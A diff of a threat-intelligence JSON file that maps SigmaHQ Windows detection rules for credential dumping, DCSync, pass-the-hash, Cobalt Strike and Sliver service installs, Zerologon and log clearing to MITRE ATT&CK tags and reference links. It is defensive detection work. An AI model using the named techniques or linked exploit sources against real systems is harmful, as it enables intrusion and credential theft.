"tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", "value": "Password Protected ZIP File Opened (Suspicious Filenames)" }, @@ -8690,8 +8914,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" ], "tags": [ @@ -8758,8 +8982,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" ], "tags": [ @@ -8792,9 +9016,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ @@ -8827,9 +9051,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://adsecurity.org/?p=3466", "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", - "https://adsecurity.org/?p=3466", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ @@ -8862,9 +9086,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1581300963650187264?", - "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" ], "tags": [ @@ -8932,9 +9156,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.sans.org/webcasts/119395", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.sans.org/webcasts/119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" ], "tags": [ @@ -9020,8 +9244,8 @@ "refs": [ "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ @@ -9055,8 +9279,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" ], "tags": [ @@ -9296,8 +9520,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml" ], @@ -9334,8 +9558,21 @@ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1550" + ] }, + "related": [ + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", "value": "Outgoing Logon with New Credentials" }, @@ -9352,8 +9589,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_krbrelayup.yml" ], "tags": [ @@ -9377,8 +9614,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://twitter.com/Purp1eW0lf/status/1616144561965002752", + "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml" ], "tags": [ @@ -9513,14 +9750,26 @@ "logsource.product": "windows", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml" ], - "tags": "No established tags" + "tags": [ + "attack.persistence", + "attack.t1098" + ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b237c54b-0f15-4612-a819-44b735e0de27", "value": "A Security-Enabled Global Group Was Deleted" }, @@ -9605,15 +9854,27 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml" ], - "tags": "No established tags" + "tags": [ + "attack.persistence", + "attack.t1098" + ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02c39d30-02b5-45d2-b435-8aebfe5a8629", "value": "A Member Was Removed From a Security-Enabled Global Group" }, @@ -9734,8 +9995,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://twitter.com/Purp1eW0lf/status/1616144561965002752", + "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml" ], "tags": [ @@ -9819,15 +10080,27 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml" ], - "tags": "No established tags" + "tags": [ + "attack.persistence", + "attack.t1098" + ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c43c26be-2e87-46c7-8661-284588c5a53e", "value": "A Member Was Added to a Security-Enabled Global Group" }, @@ -9960,8 +10233,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://goo.gl/PsqrhT", "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" ], "tags": [ @@ -10077,11 +10350,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://twitter.com/DidierStevens/status/1217533958096924676", "https://twitter.com/VM_vivisector/status/1217190929330655232", "https://nullsec.us/windows-event-log-audit-cve/", - "https://twitter.com/DidierStevens/status/1217533958096924676", "https://www.youtube.com/watch?v=ebmW42YYveI", - "https://twitter.com/FlemmingRiis/status/1217147415482060800", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml" ], "tags": [ @@ -10300,9 +10573,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ @@ -10335,8 +10608,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msexchange_control_panel/win_vul_cve_2020_0688.yml" ], "tags": [ @@ -10404,8 +10677,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", - "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", + "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml" ], "tags": [ @@ -10599,8 +10872,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml" ], "tags": [ @@ -10728,9 +11001,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml" ], "tags": [ @@ -10909,9 +11182,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml" ], "tags": [ @@ -10934,9 +11207,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml" ], "tags": [ @@ -10959,9 +11232,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml" ], "tags": [ @@ -10984,10 +11257,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://twitter.com/SBousseaden/status/1483810148602814466", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://twitter.com/SBousseaden/status/1483810148602814466", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" ], "tags": [ @@ -11010,9 +11283,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml" ], "tags": [ @@ -11035,9 +11308,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml" ], "tags": [ @@ -11060,9 +11333,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml" ], "tags": [ @@ -11120,9 +11393,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml" ], "tags": [ @@ -11155,9 +11428,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml" ], "tags": [ @@ -11181,8 +11454,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/KevTheHermit/status/1410203844064301056", - "https://github.com/hhlxf/PrintNightmare", "https://github.com/afwu/PrintNightmare", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml" ], "tags": [ @@ -11238,11 +11511,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://winaero.com/enable-openssh-server-windows-10/", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], "tags": [ @@ -11275,9 +11548,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml", "https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers", "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", + "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml" ], "tags": [ @@ -11504,9 +11777,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346", "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "Internal Research", + "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml" ], "tags": [ @@ -11662,8 +11935,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" ], "tags": [ @@ -11763,8 +12036,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml" ], "tags": [ @@ -11937,9 +12210,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://twitter.com/malmoeb/status/1535142803075960832", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml" ], "tags": [ @@ -12073,9 +12346,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", "https://twitter.com/gentilkiwi/status/861641945944391680", - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml" ], "tags": [ @@ -12296,9 +12569,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://twitter.com/jonasLyk/status/1347900440000811010", "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", "https://twitter.com/wdormann/status/1347958161609809921", - "https://twitter.com/jonasLyk/status/1347900440000811010", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml" ], "tags": [ @@ -12515,8 +12788,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" ], "tags": [ @@ -12982,9 +13255,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.sans.org/webcasts/119395", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.sans.org/webcasts/119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml" ], "tags": [ @@ -13220,8 +13493,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml" ], "tags": [ @@ -14155,8 +14428,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml" ], "tags": [ @@ -14191,8 +14464,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml" ], "tags": [ @@ -14224,8 +14497,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.secura.com/blog/zero-logon", "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://www.secura.com/blog/zero-logon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" ], "tags": [ @@ -14346,9 +14619,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml" ], "tags": [ @@ -14381,9 +14654,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml" ], "tags": [ @@ -14416,8 +14689,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", 